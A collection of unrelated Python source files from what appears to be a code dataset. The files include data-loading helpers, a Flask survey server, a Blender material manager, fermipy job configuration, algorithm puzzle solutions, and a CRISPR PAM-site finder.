def tsv2ndarray(feature_path, feature_files):
    """Load tab-separated feature matrices and stack them into a 3-D array.

    Same as csv2ndarray but with sep='\\t' and without forcing a float dtype
    (preserving the original behaviour of this variant).
    """
    feature_input = []
    for name in feature_files:
        frame = pd.read_csv(feature_path + name, sep='\t', index_col=False, header=None)
        # BUGFIX: DataFrame.as_matrix() was removed in pandas 0.25 -- use
        # to_numpy(). The original same-shape reshape was a no-op and is gone.
        feature_input.append(frame.to_numpy())
    return np.array(feature_input)
def get_abs_path(input_path):
    """Expand a leading '~' in *input_path* to the user's home directory.

    On Windows (detected by a home path starting with a drive letter) '~'
    maps to the user's Documents folder, mirroring the original behaviour.
    """
    home = expanduser("~")
    if re.match(r'^[A-Z]', home):
        home = home + '\\Documents'
    # BUGFIX: str.replace instead of re.sub -- backslashes in a Windows home
    # path are treated as escape sequences in a re.sub replacement string and
    # would corrupt the result (or raise re.error).
    return input_path.replace('~', home)
def viz_model(Data, base_dir, Type, epochs):
    """Plot generator/discriminator loss histories and save the figure.

    Writes <base_dir>/GANs_result/Loss_value/<Type>_<epochs>.jpg, then shows
    and closes the figure.
    """
    import matplotlib.pyplot as plt
    gen_history = np.array(Data['generator'], dtype=float)
    dis_history = np.array(Data['discriminator'], dtype=float)
    out_path = base_dir + 'GANs_result/Loss_value/' + Type + '_' + str(epochs) + '.jpg'
    # Columns 1 and 2 hold the main and auxiliary losses respectively.
    for series in (gen_history[:, 1], gen_history[:, 2],
                   dis_history[:, 1], dis_history[:, 2]):
        plt.plot(series)
    plt.title('GrapheneGANs_loss')
    plt.ylabel('Loss_Value')
    plt.xlabel('Epoch_Num')
    plt.legend(['Gen_Loss', 'Gen_aux', 'Dis_Loss', 'Dis_aux'], loc='upper left')
    plt.savefig(out_path)
    plt.show()
    plt.close()
def flatten(l):
    """Recursively yield the atoms of an arbitrarily nested iterable.

    Strings and bytes are treated as atoms, not iterated character-wise.
    """
    # BUGFIX: collections.Iterable was removed in Python 3.10; the ABC now
    # lives in collections.abc.
    from collections.abc import Iterable
    for el in l:
        if isinstance(el, Iterable) and not isinstance(el, (str, bytes)):
            yield from flatten(el)
        else:
            yield el
def cartesian_iterative(pools):
    """Return the Cartesian product of *pools* as a list of lists.

    Equivalent to itertools.product, but each combination is a list and the
    whole product is materialized.
    """
    combos = [[]]
    for pool in pools:
        combos = [combo + [item] for combo in combos for item in pool]
    return combos
994,946 | 549795d81766a144e827d9ce9abb642074c89efc | #!/usr/bin/python
import urllib
import re
class StockQuote:
    """Fetch quote fields from the (now defunct) Yahoo Finance CSV API.

    NOTE(review): legacy Python 2 code -- `urllib.urlopen` does not exist on
    Python 3, and Yahoo retired the quotes.csv endpoint, so this class is
    kept for reference only.
    """

    def get_quote(self, symbol):
        """Return the raw comma-split response fields for *symbol*.

        The f-codes 'sb3b2l1l' presumably request symbol, bid, ask and last
        trade -- verify against the historical Yahoo f-code table before
        trusting the field order.
        """
        data = []  # unused; leftover from an earlier multi-symbol version
        url = 'http://finance.yahoo.com/d/quotes.csv?s='
        url += symbol
        url += "&f=sb3b2l1l"
        # proxies={} forces a direct connection (Python 2 urllib API).
        f = urllib.urlopen(url, proxies={})
        rows = f.read()
        values = [x for x in rows.split(',')]
        return values
if __name__ == '__main__':
    # Smoke test against the live endpoint. Python 2 print statement -- this
    # file predates Python 3 and will not parse under it.
    sq = StockQuote()
    print sq.get_quote('AAPL')
|
994,947 | a2478f843f7b07bec3066148836ce7465fd9d929 | from collections import defaultdict
from collections import Counter
import collections
import enum
from re import A
#import numpy as np
import sys
import argparse
import math
import random
from tkinter import N
# https://www.daleseo.com/python-typing/
from typing import Optional
from typing import Union
from typing import List
from typing import Final
from typing import Dict
from typing import Tuple
from typing import Set
import time
# getSmallestString.py : https://github.com/cheoljoo/problemSolving/tree/master/leetcode
timeFlag = 0
debugFlag = 0
import math
class Solution:
    """LeetCode 1663: lexicographically smallest string of length n whose
    character values sum to k (a=1 ... z=26)."""

    def getSmallestString(self, n: int, k: int) -> str:
        """Greedy construction, O(n) time.

        For each position keep the letter as small as possible while the
        remaining positions (at most 26 each) can still reach the target.
        Replaces the original while-loop bookkeeping, which also carried an
        unreachable trailing ``return ''``.
        """
        letters = []
        for pos in range(n):
            remaining = n - pos - 1
            # Smallest usable value here: the rest can contribute at most
            # 26 per slot, so we must take at least k - 26*remaining.
            value = max(1, k - 26 * remaining)
            letters.append(chr(ord('a') + value - 1))
            k -= value
        return ''.join(letters)

    def getNum(self, ch) -> int:
        """Map 'a'..'z' to 1..26."""
        return ord(ch) - ord('a') + 1
def run(s, s1, expect):
    """Time one getSmallestString(s, s1) call and report SUCCESS/ERROR
    against the *expect* string."""
    started = time.time()
    solver = Solution()
    answer = solver.getSmallestString(s, s1)
    print(" total_time1 : ", time.time() - started, "-> ", end="")
    if answer == expect:
        print("SUCCESS -> ", end="")
    else:
        print("ERROR(", expect, ") -> ", sep="", end="")
    print(answer, s, end="")
    print()
if (__name__ == "__main__"):
    # CLI wrapper: only a --debug flag, then a fixed battery of test cases.
    arg_parser = argparse.ArgumentParser(
        prog='getSmallestString.py',
        description=
        'getSmallestString'
    )
    arg_parser.add_argument('--debug', '-d', action='store_const', const=1, help='debug on')
    cli_args = arg_parser.parse_args()
    debug = cli_args.debug or 0  # normalize None -> 0
    print('getSmallestString problem :')
    # (n, k, expected) cases; long expected strings built programmatically
    # so the letter counts are unambiguous.
    for n_arg, k_arg, expected in (
        (3, 27, 'aay'),
        (5, 73, 'aaszz'),
        (50, 80, 'a' * 48 + 'fz'),
        (1, 26, 'z'),
        (1, 2, 'b'),
        (2, 52, 'zz'),
        (3, 3, 'aaa'),
        (90, 200, 'a' * 85 + 'k' + 'z' * 4),
        (90, 1121, 'a' * 48 + 'g' + 'z' * 41),
    ):
        run(n_arg, k_arg, expected)
|
994,948 | 73dfb95a858941903b436b4ef50c903da0936d69 | """
The server for Reddit poll
"""
import json
from datetime import datetime
import sqlite3
from contextlib import closing
from flask import Flask, render_template, request, send_from_directory
from flask import g, url_for
from numpy import base_repr
app = Flask(__name__, static_url_path="")

# Reference schema for the sqlite database (kept as in-source documentation).
"""
create table user(
roll text primary key,
name text);

create table survey(
user text,
subreddit text,
value integer);
"""

DATABASE = "./data.sqlite3"           # sqlite file opened by connect_db()
SUBREDDIT_FILE = "./final_subs.txt"   # whitespace-separated subreddit names
USER_JSONFILE = './user-reddit.json'  # key -> {participant, index, npages}
POSTS_LINK_FILE = './final_post_data.json'  # subreddit -> {post_id: metadata}

DEFAULT_PARAMS = {
    "survey": {
        "title": "Identifying sources of value for subreddits",
        "description": (
            "Survey on categorizing post-based/comment-based subreddits"
            "in Reddit."),
    }
}

# Loaded once at import time; read_json() below (re)loads key_data the same way.
post_link_data = {}
with open(POSTS_LINK_FILE) as pobj:
    post_link_data = json.load(pobj)

with open(SUBREDDIT_FILE) as fobj:
    subreddits = fobj.read().split()
def read_json():
    """(Re)load the per-user key data from USER_JSONFILE into `key_data`."""
    global key_data
    # BUGFIX: use a context manager so the file handle is closed (the
    # original `json.load(open(...))` leaked it).
    with open(USER_JSONFILE) as fobj:
        key_data = json.load(fobj)


read_json()
def connect_db():
    """Open a fresh connection to the sqlite database file."""
    connection = sqlite3.connect(DATABASE)
    return connection
def init_db():
    """Create the database schema from schema.sql -- call once from main initially."""
    with closing(connect_db()) as db:
        with app.open_resource('schema.sql') as fobj:
            # BUGFIX: open_resource yields bytes on Python 3, but
            # executescript requires str -- decode explicitly.
            db.cursor().executescript(fobj.read().decode('utf-8'))
        db.commit()
@app.before_request
def before_request():
    """Open a per-request database handle on flask.g."""
    g.db = connect_db()
@app.after_request
def after_request(response):
    """Close the per-request database handle opened in before_request."""
    g.db.close()
    return response
def query_db(query, args=(), one=False):
    """Execute *query* with *args*, commit, and return rows as dicts.

    With one=True, return only the first row (or None when there is none).
    """
    cur = g.db.execute(query, args)
    g.db.commit()
    columns = [desc[0] for desc in cur.description]
    rows = [dict(zip(columns, row)) for row in cur.fetchall()]
    if one:
        return rows[0] if rows else None
    return rows
@app.route('/components/<path:path>')
def send_js(path):
    """Serve front-end component assets installed by bower."""
    return send_from_directory('bower_components', path)
@app.route('/css/<path:path>')
def send_css(path):
    """Serve static stylesheets."""
    return send_from_directory('css', path)
@app.route('/')
def root():
    """Landing page: show instructions for the user identified by ?c=KEY."""
    params = dict(DEFAULT_PARAMS)
    key = request.args.get('c', None)
    if key is None or key not in key_data:
        # Missing or unknown participant key -> generic error page.
        return render_template('error.html.jinja2', **params)
    user = key_data[key]
    params.update({
        "next_page": url_for("survey_begin", c=key),
        "participant": user['participant'],
        "npages": user['npages'],
    })
    return render_template('instructions.html.jinja2', **params)
@app.route('/start_survey')
def survey_begin():
    """First survey page for the participant identified by ?c=KEY."""
    c = request.args.get('c')
    params = dict(DEFAULT_PARAMS)
    sub = subreddits[key_data[c]['index']]
    post_links = []
    for post_id, data in post_link_data[sub].items():
        # Reddit permalinks use base-36 post ids.
        permalink = "https://reddit.com/r/" + sub + "/comments/" + base_repr(int(post_id), 36)
        post_links.append((permalink, data))
    params.update({
        "c": c,
        "subreddit": subreddits[key_data[c]['index']],
        "id": key_data[c]['index'],
        "nmore": key_data[c]['npages'],
        "percent": 0,
        "post_links": post_links
    })
    return render_template('poll.html.jinja2', **params)
@app.route('/poll/<int:id>')
def poll(id):
    """Store the ratings submitted for page *id*, then serve the next page
    (or the finish page when the participant's quota is done)."""
    params = dict(DEFAULT_PARAMS)
    key = request.args.get('c')
    subreddit = subreddits[id]  # kept for parity with the original (unused)
    # Persist every submitted field except the bookkeeping parameters.
    for field, value in request.args.items():
        if field in ('c', 'subreddit'):
            continue
        query_db("insert into link_value values(?,?,?,?)",
                 [key, field, value, datetime.utcnow()])
    user = key_data[key]
    if id + 1 >= user['npages'] + user['index']:
        # Last assigned page: thank the participant.
        params.update({
            "participant": user['participant']
        })
        return render_template('finish.html.jinja2', **params)
    sub = subreddits[id + 1]
    post_links = []
    for num, data in post_link_data[sub].items():
        # Reddit permalinks use base-36 post ids.
        permalink = "https://reddit.com/r/" + sub + "/comments/" + base_repr(int(num), 36)
        post_links.append((permalink, data))
    done = id - user['index'] + 1
    params.update({
        "c": key,
        "subreddit": subreddits[id + 1],
        "id": id + 1,
        "nmore": user['npages'] - done,
        "percent": float(done) / user['npages'] * 100,
        "post_links": post_links
    })
    return render_template('poll.html.jinja2', **params)
if __name__ == "__main__":
    # Development server only; use a real WSGI server in production.
    app.run(debug=True)
|
994,949 | 543bcb463041f37e84c10279ec685045e9285d4b | # finance_data.py
# tutorial: https://www.freecodecamp.org/news/how-to-scrape-websites-with-python-and-beautifulsoup-5946935d93fe/
# Import libs
from bs4 import BeautifulSoup as BS
import requests as r
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# Read data from the Bloomberg quote page for the S&P 500 index.
source = "https://www.bloomberg.com/quote/SPX:IND"

browser = webdriver.Firefox(executable_path='/usr/local/share/gecko_driver/geckodriver')
try:
    browser.get(source)
    print("success")
except Exception:
    # BUGFIX: was a bare `except:`, which also swallowed SystemExit and
    # KeyboardInterrupt; catch Exception only.
    print("WTF")

# Dump the text of every <span> on the page.
textlist = browser.find_elements_by_tag_name("span")
for text_elements in textlist:
    text = text_elements.text
    print(text)
# delay = 3
# WebDriverWait(browser, delay).until(EC.presence_of_element_located(browser.find_elements_by_id("a")))
# Parse data from website
# soup = BS(, "html.parser")
# elements = soup.select("div > span")
# print(soup.prettify())
# --------end of basic web scraping---------
# find finance data on Bloomberg website
#name_box = soup.find("h1", attrs={"class": "companyName__99a4824b"})
#name = name_box.text.strip()
#print(name)
# seems like the web page is not parsed properly since there is no companyname in xml view included. |
994,950 | a29fe86bc1b45f6beede19e51634656eaa0125c0 | import app
# NOTE(review): rebinding `app` shadows the imported `app` module; after this
# line the module itself is unreachable under that name. Works, but a
# different variable name would be clearer.
app = app.APP()
app.main()
|
994,951 | 2ed85d6999f988d3023ba7d2b3b61d8b906581d5 | """
shyness = [n, m, k, ...]
1) sort in ascending order of shyness
2) find first person who won't stand and add enough people to make him/her stand
and iterate
- accumulate number of standing people as you pass down the sorted list
"""
def solve(shyness_counts):
    """Return the minimum number of friends to add so everyone stands.

    shyness_counts[s] people stand only once s others are already standing
    (Code Jam "Standing Ovation"). Walk shyness levels in ascending order,
    recruiting just enough friends whenever the standing count falls short.
    """
    standing = 0
    added = 0
    for shyness, count in enumerate(shyness_counts):
        if not count:
            continue
        if shyness > standing:
            # Not enough people on their feet yet: top up with friends.
            shortfall = shyness - standing
            added += shortfall
            standing += shortfall
        standing += count
    return added
def std_in():
    """Infinite generator yielding one raw line of stdin per next() call.

    NOTE(review): Python 2 only -- `raw_input` was renamed `input` in Python 3.
    """
    while True:
        yield raw_input()
def main():
    """Read T test cases from stdin and print one 'Case #i: answer' per case.

    Input (Code Jam format): first line T; each case line is
    "<s_max> <digit-string>" where digit i is the count of people at
    shyness level i. Python 2 only (print statement, xrange, list-map).
    """
    STD_IN = std_in()
    T = int(next(STD_IN).strip())
    for t in xrange(T):
        # s_max is redundant (it equals len(shyness_counts)) and is ignored.
        s_max, shyness_counts = next(STD_IN).strip().split()
        solution = solve(map(int, shyness_counts))
        print 'Case #{}: {}'.format(t+1, solution)

if __name__ == '__main__':
    main()
|
994,952 | 9b4dd65e040249f1041113177aa44598574e4a9e | #!/usr/bin/env python
#
"""
Prepare data for diffuse all-sky analysis
"""
import os
import copy
from collections import OrderedDict
import yaml
from fermipy.jobs.utils import is_null
from fermipy.jobs.link import Link
from fermipy.jobs.chain import Chain
from fermipy.jobs.scatter_gather import ScatterGather
from fermipy.jobs.slac_impl import make_nfs_path
from fermipy.diffuse.utils import create_inputlist
from fermipy.diffuse.name_policy import NameFactory
from fermipy.diffuse.binning import Component
from fermipy.diffuse import defaults as diffuse_defaults
from fermipy.diffuse.job_library import Gtlink_ltsum, Link_FermipyCoadd
NAME_FACTORY = NameFactory()
def _make_input_file_list(binnedfile, num_files):
"""Make the list of input files for a particular energy bin X psf type """
outdir_base = os.path.abspath(os.path.dirname(binnedfile))
outbasename = os.path.basename(binnedfile)
filelist = ""
for i in range(num_files):
split_key = "%06i" % i
output_dir = os.path.join(outdir_base, split_key)
filepath = os.path.join(output_dir,
outbasename.replace('.fits', '_%s.fits' % split_key))
filelist += ' %s' % filepath
return filelist
class CoaddSplit(Chain):
    """Small class to merge counts cubes for a series of binning components

    This chain consists multiple `Link` objects:

    coadd-EBIN-ZCUT-FILTER-EVTYPE : `_Link_FermipyCoadd`
        Link to coadd data of a particular type.
    """
    appname = 'fermipy-coadd-split'
    linkname_default = 'coadd-split'
    usage = '%s [options]' % (appname)
    description = 'Merge a set of counts cube files'

    default_options = dict(comp=diffuse_defaults.diffuse['comp'],
                           data=diffuse_defaults.diffuse['data'],
                           do_ltsum=(False, 'Sum livetime cube files', bool),
                           nfiles=(96, 'Number of input files', int),
                           dry_run=(False, 'Print commands but do not run them', bool))

    __doc__ += Link.construct_docstring(default_options)

    def __init__(self, **kwargs):
        """C'tor"""
        super(CoaddSplit, self).__init__(**kwargs)
        self.comp_dict = None

    def _map_arguments(self, args):
        """Map from the top-level arguments to the arguments provided to
        the individual links"""
        comp_file = args.get('comp', None)
        datafile = args.get('data', None)
        do_ltsum = args.get('do_ltsum', False)
        NAME_FACTORY.update_base_dict(datafile)
        outdir_base = os.path.join(NAME_FACTORY.base_dict['basedir'], 'counts_cubes')
        num_files = args.get('nfiles', 96)
        # Close the component yaml promptly (the original leaked the handle).
        with open(comp_file) as comp_fobj:
            self.comp_dict = yaml.safe_load(comp_fobj)
        coordsys = self.comp_dict.pop('coordsys')

        # One group of links per (energy bin, mktime filter, event class, psf type).
        for key_e, comp_e in sorted(self.comp_dict.items()):
            if 'mktimefilters' in comp_e:
                mktimelist = comp_e['mktimefilters']
            else:
                mktimelist = ['none']
            if 'evtclasses' in comp_e:
                evtclasslist_vals = comp_e['evtclasses']
            else:
                evtclasslist_vals = [NAME_FACTORY.base_dict['evclass']]

            for mktimekey in mktimelist:
                zcut = "zmax%i" % comp_e['zmax']
                kwargs_mktime = dict(zcut=zcut,
                                     ebin=key_e,
                                     psftype='ALL',
                                     coordsys=coordsys,
                                     mktime=mktimekey)
                if do_ltsum:
                    ltsum_listfile = 'ltsumlist_%s_%s' % (key_e, mktimekey)
                    ltsum_outfile = 'ltsum_%s_%s' % (key_e, mktimekey)
                    linkname = 'ltsum_%s_%s' % (key_e, mktimekey)
                    # BUGFIX: was `self._set_link(likname, ...)` -- a typo
                    # that raised NameError whenever do_ltsum was enabled.
                    self._set_link(linkname, Gtlink_ltsum,
                                   infile1=ltsum_listfile,
                                   infile2=None,
                                   outfile=ltsum_outfile,
                                   logfile=os.path.join(outdir_base, "%s.log" % linkname))
                for evtclassval in evtclasslist_vals:
                    for psf_type in sorted(comp_e['psf_types'].keys()):
                        fullkey = "%s_%s_%s_%s" % (key_e, mktimekey, evtclassval, psf_type)
                        linkname = 'coadd_%s' % (fullkey)
                        kwargs_bin = kwargs_mktime.copy()
                        kwargs_bin['psftype'] = psf_type
                        kwargs_bin['evclass'] = evtclassval
                        ccube_name =\
                            os.path.basename(NAME_FACTORY.ccube(**kwargs_bin))
                        outputfile = os.path.join(outdir_base, ccube_name)
                        args = _make_input_file_list(outputfile, num_files)
                        self._set_link(linkname,
                                       Link_FermipyCoadd,
                                       args=args,
                                       output=outputfile,
                                       logfile=os.path.join(outdir_base, "%s.log" % linkname))
class CoaddSplit_SG(ScatterGather):
    """Small class to generate configurations for fermipy-coadd
    """
    appname = 'fermipy-coadd-split-sg'
    usage = "%s [options]" % (appname)
    description = "Submit fermipy-coadd-split- jobs in parallel"
    clientclass = Link_FermipyCoadd

    # Requested wall time per batch job, in seconds.
    job_time = 300

    default_options = dict(comp=diffuse_defaults.diffuse['comp'],
                           data=diffuse_defaults.diffuse['data'],
                           ft1file=(None, 'Input FT1 file', str))

    __doc__ += Link.construct_docstring(default_options)

    def build_job_configs(self, args):
        """Hook to build job configurations

        Builds one coadd job per (energy bin, mktime filter, event class,
        PSF type) combination and returns them keyed by that combination.
        """
        job_configs = {}

        components = Component.build_from_yamlfile(args['comp'])

        datafile = args['data']
        if datafile is None or datafile == 'None':
            # Nothing to schedule without a data configuration.
            return job_configs
        NAME_FACTORY.update_base_dict(args['data'])
        outdir_base = os.path.join(NAME_FACTORY.base_dict['basedir'], 'counts_cubes')

        # The number of per-split inputs determines each job's file list.
        inputfiles = create_inputlist(args['ft1file'])
        num_files = len(inputfiles)

        for comp in components:
            zcut = "zmax%i" % comp.zmax

            mktimelist = copy.copy(comp.mktimefilters)
            if not mktimelist:
                mktimelist.append('none')  # default: no mktime filter
            evtclasslist_keys = copy.copy(comp.evtclasses)
            if not evtclasslist_keys:
                # Fall back to the event class from the base configuration.
                evtclasslist_vals = [NAME_FACTORY.base_dict['evclass']]
            else:
                evtclasslist_vals = copy.copy(evtclasslist_keys)

            for mktimekey in mktimelist:
                for evtclassval in evtclasslist_vals:
                    fullkey = comp.make_key(
                        '%s_%s_{ebin_name}_%s_{evtype_name}' %
                        (evtclassval, zcut, mktimekey))

                    name_keys = dict(zcut=zcut,
                                     ebin=comp.ebin_name,
                                     psftype=comp.evtype_name,
                                     coordsys=comp.coordsys,
                                     irf_ver=NAME_FACTORY.irf_ver(),
                                     mktime=mktimekey,
                                     evclass=evtclassval,
                                     fullpath=True)

                    ccube_name = os.path.basename(NAME_FACTORY.ccube(**name_keys))
                    outfile = os.path.join(outdir_base, ccube_name)
                    infiles = _make_input_file_list(outfile, num_files)
                    logfile = make_nfs_path(outfile.replace('.fits', '.log'))
                    job_configs[fullkey] = dict(args=infiles,
                                                output=outfile,
                                                logfile=logfile)

        return job_configs
def register_classes():
    """Register these classes with the `LinkFactory`"""
    for link_cls in (CoaddSplit, CoaddSplit_SG):
        link_cls.register_class()
|
994,953 | 25625841dd4d653e41453f36a832d739323d4136 | import sys
from os.path import join
from pathlib import Path
import importlib
import math
import random
import bpy
# Make the project importable from inside Blender's bundled Python.
sys.path.append('/work/vframe_synthetic/vframe_synthetic')
from app.utils import log_utils, color_utils
# Reload project modules so edits are picked up without restarting Blender.
importlib.reload(log_utils)
importlib.reload(color_utils)
from app.blender.materials import colorfill
importlib.reload(colorfill)
# shortcuts
log = log_utils.Logger.getLogger()
ColorFillMaterial = colorfill.ColorFillMaterial
# ---------------------------------------------------------------------------
# Manage ground
# ---------------------------------------------------------------------------
class GroundManager:
    '''Manages ground material switching for mask/normal render passes.

    Reads the 'ground' section of the scene config, remembers each ground
    object's original materials, and can swap them for a flat-color mask
    material (mask), a configured ground variant (set_ground/randomize),
    or restore the originals (unmask/cleanup).
    '''

    def __init__(self, cfg):
        cfg_ground = cfg.get('ground', {})
        # One "iteration" per configured ground material variant.
        self._iterations = len(cfg_ground.get('materials', []))
        self.ground_materials = cfg_ground.get('materials', [])
        self.ground_objects = self.generate_placeholders(cfg_ground)

    def generate_placeholders(self, cfg):
        '''Generates list of object names in this particle system'''
        placeholders = {}
        for o in cfg.get('objects', []):
            obj_name = o.get('name')
            obj_scene = bpy.data.objects.get(obj_name)
            if not obj_scene:
                # NOTE(review): logs and continues; the attribute accesses
                # below would then fail on the missing object -- verify the
                # config is validated upstream.
                log.error(f'{obj_name} is not an object in this scene')
            # Remember the original materials so unmask()/cleanup() can restore them.
            o['default_material'] = obj_scene.active_material.name
            o['material_slots_defaults'] = [ms.material.name for ms in obj_scene.material_slots]
            o['unmask_material'] = o['default_material']
            o['ground_materials'] = o.get('material')
            # Create (once per object) a flat-color material for mask renders.
            cf_mat_name = f'mat_{obj_name}_colorfill'
            if not cf_mat_name in bpy.data.materials.keys():
                color = color_utils.rgb_packed_to_rgba_norm(o.get('color', 0x000000))
                cfm = ColorFillMaterial(cf_mat_name, color)
            o['colorfill_material'] = cf_mat_name
            placeholders[obj_name] = o
        return placeholders

    def mask(self):
        '''Changes object materials to colorfill'''
        for name, base_obj in self.ground_objects.items():
            mat_name = base_obj.get('colorfill_material')
            cf_mat = bpy.data.materials.get(mat_name)
            obj_scene = bpy.data.objects.get(name)
            # Replace the active material and every slot with the mask color.
            obj_scene.active_material = cf_mat
            for ms in obj_scene.material_slots:
                ms.material = cf_mat

    def unmask(self):
        # Restore the material that was active before mask() was called
        # (the default, or whatever set_ground() selected last).
        for name, base_obj in self.ground_objects.items():
            mat = bpy.data.materials.get(base_obj.get('unmask_material'))
            obj_scene = bpy.data.objects.get(name)
            obj_scene.active_material = mat
            for i, ms in enumerate(obj_scene.material_slots):
                mat_name = base_obj['material_slots_defaults'][i]
                mat = bpy.data.materials.get(mat_name)
                ms.material = mat

    def set_ground(self, idx):
        # Select the idx-th configured ground material for every object and
        # make it the one unmask() restores.
        for name, base_obj in self.ground_objects.items():
            mat_name = base_obj.get('ground_materials')[idx]
            base_obj['unmask_material'] = mat_name
            bpy.data.objects.get(name).active_material = bpy.data.materials.get(mat_name)

    def randomize(self):
        # Pick one of the configured ground material variants at random.
        ridx = random.randint(0, len(self.ground_materials)-1)
        self.set_ground(ridx)

    def cleanup(self):
        '''Reset preferences'''
        for name, base_obj in self.ground_objects.items():
            mat_name = base_obj.get('default_material')
            log.debug(f'restore {name} to {mat_name}')
            bpy.data.objects.get(name).active_material = bpy.data.materials.get(mat_name)
            # Delete the helper colorfill material created in generate_placeholders.
            mat_name_cfg = base_obj.get('colorfill_material')
            if mat_name_cfg in bpy.data.materials.keys():
                bpy.data.materials.remove(bpy.data.materials.get(mat_name_cfg))

    @property
    def iterations(self):
        # Number of configured ground material variants.
        return self._iterations
|
994,954 | 388404e0ae54aae34178bdc22ad03b29c2f6741d | clusters = [('seq1',), ('seq2',), ('seq3',), ('seq4',), ('seq5',)]
# Flatten the merge specification into one tuple of sequence labels.
merges = (('seq3',), ('seq4',))
temp_subcluster = ()
# ``[merges][-1]`` wrapped the tuple in a one-item list only to index it
# straight back out -- iterate ``merges`` directly.
for items in merges:
    if isinstance(items, tuple):  # prefer isinstance over ``type(...) is``
        for element in items:
            temp_subcluster += (element,)  # merge sub sub clusters into one
    else:
        temp_subcluster += (items,)
994,955 | ba159673fb165939df0429747f1d8edb21d9751d | from rest_framework import serializers
class ProfileSerializer(serializers.Serializer):
    """Read-only serializer exposing summary statistics for a user profile."""
    id = serializers.IntegerField()  # user primary key
    username = serializers.CharField()
    last_login = serializers.DateTimeField()  # timestamp of most recent login
    login_count = serializers.IntegerField()  # total number of logins
    project_count = serializers.IntegerField()  # number of projects for this user
|
994,956 | ba2606e8b5ea8c7a411adc9fe594316c599b19d1 | ### Chapter 11: Testing Your Code
## Testing a Class
# A Class to Test (Cont'd)
# Interactive driver: collects free-text answers until the user types 'q',
# then prints the collected responses via AnonymousSurvey (local module).
from survey import AnonymousSurvey
""" Define a question and start a survey. """
question = "What language did you first learn to speak? "
my_survey = AnonymousSurvey(question)
""" Show the question and store responses to the question. """
my_survey.show_question()
print('Enter \'q\' at any time to quit.')
while True:
    response = input('Language: ')
    if response == 'q':
        # sentinel: stop collecting, do not store 'q' itself
        break
    my_survey.store_response(response)
""" Show the survey results. """
print('Thank you to everyone who participated in the survey!')
my_survey.show_results()
994,957 | 2f345ddbcac1a2e6eb5cde2da7a2ce9a9535fc95 | #!/usr/bin/env python3
#Name: Jasrajveer Malhi (jmalhi)
"""
The program PAMfinder uses a fasta file input and will output a text file containg the 20 nucleotide sequence adjacent to PAM sequence (NGG).
The general flow of the program is to first run through all six reading frames to identify the 'NGG' sequence then print out the corresponding
guide sequence. This guide sequence can then be useful for designing a CRISPR guides.
"""
class FastAreader :
    """Minimal FASTA parser over an iterable of text lines."""
    def __init__ (self, file):
        '''Constructor: saves the line iterable / open file handle.'''
        self.file = file
    def readFasta (self):
        ''' Read every FastA record; return ([headers], [sequences]).

        Headers keep their leading ">" (trailing newline stripped); each
        sequence is its lines concatenated with line endings removed.
        Blank lines are skipped -- the original ``line[0]`` test raised
        IndexError on an empty line.
        '''
        header = ''
        sequence = ''
        headerList = []
        sequenceList = []
        for line in self.file:
            if not line.strip():
                continue  # ignore blank lines instead of crashing on line[0]
            if line.startswith(">"):
                headerList.append(line.strip("\n"))
                if header:
                    # close out the previous record before starting a new one
                    sequenceList.append(sequence)
                header = line
                sequence = ''
            else:
                sequence += line.strip("\r\n")
        # flush the final record (empty string when input had no sequences,
        # matching the original behavior)
        sequenceList.append(sequence)
        return (headerList, sequenceList)
class PAMfinder:
    """The class PAMfinder will run through all six reading frames of the DNA sequence, find the 'NGG' sequence and set all the values
    for the forward strand to listofPAMS and for the reverse they are set to listofReversedPAMS."""
    def __init__(self,sequenceList):
        self.headers = sequenceList[0] # Initialize the first value, it is the header.
        self.sequences = sequenceList[1] # Initialize the second value, this contains the sequence itself.
        self.reversedSequenceList = [] # Initialize a list that will store the reverse sequence.
        self.listofPAMS = [] # Initialize the list for the forward PAM sequences.
        self.listofReversedPAMS = [] # Initialize the list of reverse PAM sequences.
    def classController(self):
        """The controller will be used for requests made, and the class will grab
        the apropriate models. In this case the controller would grab the headers,
        list of PAMS, ad the reverse list. """
        import sys
        # process every record: build its reverse complement, then scan both strands
        for i in range(0,len(self.headers)):
            self.reverser(i)
            self.findPAMs(i)
        return (self.headers,self.listofPAMS,self.listofReversedPAMS)
    def reverser(self,i):
        """Reverser is necessary because we are looking at all 6 reading frames, so the bottom
        strand positions need to be counted in a reversed manner where the positions will be corelating
        to the 5' position."""
        import sys
        counter = 0
        reversedSeq = list(self.sequences[i][::-1]) # Create a reversed list that will allow for counting to be done relative to forward strand.
        for character in reversedSeq: # Assign the corresponding reveresed values.
            if character == "A":
                reversedSeq[counter] = "T"
            elif character == "T":
                reversedSeq[counter] = "A"
            elif character == "C":
                reversedSeq[counter] = "G"
            else:
                # NOTE(review): the fallback maps 'G' -> 'C' correctly, but any
                # other symbol (N, lowercase, gaps) also silently becomes 'C'
                reversedSeq[counter] = "C"
            counter+=1
        reversedSeq = "".join(reversedSeq) # After the sequence is reversed, join all the values togther.
        self.reversedSequenceList.append(reversedSeq) # Add the reversedSeq to the end of the reversedSequenceList.
    def findPAMs(self,i):
        """FindPAMS is used to find the PAM sequence and add it to the lists created for
        the forward and reverse strand along with the corresponding positions. """
        import sys
        listofPAMS = [] # Create a list for the PAM sequences.
        listofReversedPAMS = [] # Create a list for the reverse PAM sequences.
        counter = 0 # This counter starts for the forward sequences.
        # 'GG' at counter-1..counter marks the PAM; the 20-nt guide precedes it
        for nucleotide in self.sequences[i]:
            if nucleotide == "G" and self.sequences[i][counter-1] == "G":
                if counter > 23: # Have a set length that is 23 or greater to pass it on.
                    listofPAMS.append((self.sequences[i][counter-22:counter-2],counter-1)) # Add the sequence with the correct position to the list.
            counter+=1
        counter = 0 # This counter starts for the reverse sequences
        for nucleotide in self.reversedSequenceList[i]: # Looking for the sequence in the reversed list.
            if nucleotide == "G" and self.reversedSequenceList[i][counter-1] == "G":
                if counter > 23:
                    # position reported relative to the top (forward) strand
                    listofReversedPAMS.append((self.reversedSequenceList[i][counter-22:counter-2],len(self.reversedSequenceList[i])-counter+2))
            counter+=1
        self.listofPAMS.append((listofPAMS)) # Add to the the forward sequences to the list.
        self.listofReversedPAMS.append((listofReversedPAMS[::-1])) # Add the reverse sequence lists to the lists for reverse sequences.
def main():
    """The main is used to print the values in a specific format. The forward and reverse sequences
    will be printed onto a text file called Guide Sequences. Along with the text file, the output will
    be displayed on terminal or wherever the code is being run. """
    import sys
    # FASTA comes from stdin; PAMfinder returns (headers, forward, reverse)
    listofSequences = FastAreader(sys.stdin).readFasta()
    PAMSequences = PAMfinder(listofSequences).classController() # Calls on controller class to return desired models.
